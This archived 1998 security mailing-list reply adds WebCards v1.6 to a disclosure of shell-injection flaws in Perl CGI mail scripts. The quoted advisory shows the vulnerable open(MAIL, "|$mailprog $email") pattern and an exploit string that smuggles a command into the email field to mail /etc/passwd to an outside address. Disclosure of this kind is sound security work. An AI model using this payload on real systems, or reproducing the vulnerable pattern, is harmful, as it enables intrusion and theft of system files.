Re: Several new CGI vulnerabilities

• Previous message: Wietse Venema: "Re: tcpd -DPARANOID doesn't work, and never did"
• Maybe in reply to: xnec: "Several new CGI vulnerabilities"
• Next in thread: Randal Schwartz: "Re: Several new CGI vulnerabilities"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

G'day,
        As a related note, the WebCards program (V1.6) by Sam Kareem
(webmasterat_private) is subject to the same vunerability.

Regards,
        Karl

On Mon, 9 Nov 1998, xnec wrote:

> INFO:
>         After looking over the perl-CGI scripts on www.cgi-resources.com,
> I've discovered vulnerabilities in the following:
>

-----Snip----8<-----------------

>
> EXPLOIT:
>
> Each of these are exploitable by inputing metacharacters into the
> recipient's email address.  Each script calls something similar
> to:
>
>  open( MAIL, "|$mailprog $email" )
>  # this particular line is from the LakeWeb scripts
>
> The exploit strings are simple, something like
> &mail evilat_private < /etc/passwd&@host.com will work for each script
> (the @host.com is necessary because some hosts check for "@" and ".")
> when placed in the Recipient Email field.
>
-----Snip-----8<---------------

• Next message: Randal Schwartz: "Re: Several new CGI vulnerabilities"
• Previous message: Wietse Venema: "Re: tcpd -DPARANOID doesn't work, and never did"
• Maybe in reply to: xnec: "Several new CGI vulnerabilities"
• Next in thread: Randal Schwartz: "Re: Several new CGI vulnerabilities"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:22:40 PDT